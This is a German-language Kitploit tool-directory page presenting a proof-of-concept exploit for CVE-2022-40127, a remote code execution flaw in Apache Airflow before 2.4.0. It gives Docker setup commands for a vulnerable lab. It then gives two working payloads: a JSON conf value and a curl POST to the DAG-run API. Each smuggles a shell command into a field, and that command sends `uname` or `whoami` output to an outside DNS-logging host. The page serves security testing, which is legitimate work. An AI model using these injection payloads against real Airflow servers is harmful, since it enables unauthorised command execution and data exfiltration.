Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-40127 — Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC | Kitploit
Tools/GitHubGitHub/mr-xn/cve-2022-40127
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubmr-xn/cve-2022-40127

CVE-2022-40127

Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC

Repository anzeigen
4162vor 3 JahrenVon Kitploit geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-40127

Apache Airflow < 2.4.0 DAG example_bash_operator RCE

PoC Docker-Umgebung:

root@kitploit:~
mkdir CVE-2022-40127 && cd CVE-2022-40127 
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
#or wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yaml
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up -d
#waiting some times
open localhost:8080

PoC 1

example_bash_operator

root@kitploit:~
{"fxoxx":"\";curl `uname`.lxx2.535ld4zn.dnslog.pw;\""}
Bild

DNS-Log via

Bild

PoC 2

root@kitploit:~
Tool herunterladen
curl -X 'POST' \ 'http://10.11.12.131:8080/api/v1/dags/example_bash_operator/dagRuns' \ -H 'accept: application/json' \ -H 'Content-Type: application/json' \ -d '{ "conf": { "dag_run": "api2" }, "dag_run_id": "id \"&& curl `whoami`.api222.535ld4zn.dnslog.pw", "logical_date": "2022-11-19T10:13:13.920Z" }'

http://localhost:8080/redoc#tag/DAGRun/operation/post_dag_run Bild

http://localhost:8080/api/v1/ui/#/DAGRun/post_dag_run Bild

Bild

DNS-Log via

Bild

Commit:

https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a

Links:

https://stackoverflow.com/questions/67110383/how-to-trigger-airflow-dag-with-rest-api-i-get-property-is-read-only-state